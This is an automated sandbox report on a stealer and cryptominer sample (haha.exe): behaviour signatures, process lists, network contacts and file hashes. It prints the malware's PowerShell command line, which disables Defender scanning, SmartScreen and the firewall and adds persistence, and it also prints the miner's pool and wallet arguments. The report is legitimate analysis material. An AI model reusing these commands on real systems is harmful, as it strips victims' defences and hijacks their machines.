Analysis Overview
SHA256
9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e
Threat Level: Known bad
The file haha.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
PhoenixStealer
Suspicious use of NtCreateUserProcessOtherParentProcess
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
Modifies security service
XMRig Miner Payload
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
Drops startup file
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Opens file in notepad (likely ransom note)
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-07 08:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-07 08:03
Reported
2022-07-07 08:14
Platform
win7-20220414-en
Max time kernel
501s
Max time network
558s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
PhoenixStealer
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1208 set thread context of 213440 | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Windows\system32\NOTEPAD.EXE | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Program Files\7-Zip\7zG.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CbsPersist_20220707080516.log | C:\Program Files\7-Zip\7zG.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\ProgramData\UpSys.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\ProgramData\UpSys.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d0dd4fd891d801 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: 0 | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\ProgramData\UpSys.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\haha.exe
"C:\Users\Admin\AppData\Local\Temp\haha.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
C:\Users\Admin\AppData\Local\Temp\79571.exe
"C:\Users\Admin\AppData\Local\Temp\79571.exe"
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
C:\ProgramData\Systemd\procexp.exe
--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CBS.log
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Windows\Logs\CBS\" -an -ai#7zMap20388:102:7zEvent1143
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 127.0.0.1:49173 | tcp | |
| N/A | 127.0.0.1:49180 | tcp | |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 52.20.78.240:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 142.132.131.248:80 | pool.hashvault.pro | tcp |
| RU | 95.142.46.35:6666 | tcp |
Files
memory/2044-54-0x0000000075441000-0x0000000075443000-memory.dmp
memory/976-55-0x0000000000000000-mapping.dmp
memory/976-57-0x0000000073F90000-0x000000007453B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\79571.ps1
| MD5 | d831df909c8d68d7ac710f09ea9a7294 |
| SHA1 | 4cf51399d9895c799c297e5e3078fa25cf4940b5 |
| SHA256 | 9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c |
| SHA512 | 000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77 |
C:\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
memory/1560-63-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
memory/976-65-0x0000000073F90000-0x000000007453B000-memory.dmp
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
memory/1208-68-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
memory/20596-71-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
memory/20596-74-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp
memory/213440-75-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213440-77-0x0000000000400000-0x000000000048E000-memory.dmp
memory/1208-79-0x0000000000400000-0x00000000005C5000-memory.dmp
memory/213512-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\ProgramData\MicrosoftNetwork\System.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/213592-87-0x0000000000000000-mapping.dmp
\ProgramData\Systemd\procexp.exe
| MD5 | 2d9fb9ed8bebb55280b81a4652dcfa11 |
| SHA1 | 76300e059e74d8cfc99a736917cd3a512dd32cab |
| SHA256 | 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf |
| SHA512 | ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c |
memory/213592-89-0x0000000000070000-0x0000000000090000-memory.dmp
C:\ProgramData\Systemd\procexp.exe
| MD5 | 2d9fb9ed8bebb55280b81a4652dcfa11 |
| SHA1 | 76300e059e74d8cfc99a736917cd3a512dd32cab |
| SHA256 | 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf |
| SHA512 | ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c |
memory/213592-90-0x0000000000000000-0x0000000001000000-memory.dmp
memory/213512-85-0x000007FEF3590000-0x000007FEF3FB3000-memory.dmp
memory/213512-92-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213512-91-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp
memory/213592-94-0x0000000000000000-0x0000000001000000-memory.dmp
memory/213440-111-0x0000000000454CB9-mapping.dmp
memory/1208-115-0x0000000000400000-0x00000000005C5000-memory.dmp
memory/213512-117-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213440-114-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213440-131-0x0000000000400000-0x000000000048E000-memory.dmp
memory/213512-93-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
memory/213972-157-0x0000000000000000-mapping.dmp
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/213512-160-0x000000000238B000-0x00000000023AA000-memory.dmp
\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/214008-163-0x0000000000000000-mapping.dmp
memory/213512-166-0x0000000002384000-0x0000000002387000-memory.dmp
memory/213512-167-0x000000000238B000-0x00000000023AA000-memory.dmp
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
memory/2040-172-0x0000000000000000-mapping.dmp
memory/2040-174-0x000007FEF2D30000-0x000007FEF3753000-memory.dmp
memory/2040-176-0x000007FEEEBF0000-0x000007FEEF74D000-memory.dmp
memory/2040-177-0x0000000002414000-0x0000000002417000-memory.dmp
memory/2040-178-0x000000000241B000-0x000000000243A000-memory.dmp
C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab
| MD5 | a32bd4bba702ab65887cc2819c0770f7 |
| SHA1 | aa978c40cb493b6216b74d860785051782cdb7fb |
| SHA256 | 45681c21b74225ca0e816bed870e3ddb81fc3ecbaaa4af964810321109309c4f |
| SHA512 | a7a21033b068679172019b2964cf133647120259ca6e21c915cfbc159316bf92a588aa19e73b804601e64e97f8e065e4ae1b56d51c46b53fbbc3e5e11e10e0e2 |
C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
| MD5 | 65cc66bc672dfe15e3f6cd35686ccb9c |
| SHA1 | 8f64ff9c931a9a92534639fddd15f4c67936438c |
| SHA256 | 6f83c8ddccc53d8788a808fcbcf500001ffc2ee9e0be71ec01a32fed536338dd |
| SHA512 | 73b106db474ccf13557ae3a8a8351e8605b0d6f04ea1dfd66033d24aea263f9bf57e89aa5d751acb25ac622e4c4e52443d4b72fff2055810fb06f93657abf8fe |
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-07 08:03
Reported
2022-07-07 08:14
Platform
win10v2004-20220414-en
Max time kernel
608s
Max time network
603s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 92304 created 67976 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\UpSys.exe |
| PID 92304 created 94360 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\UpSys.exe |
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\haha.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
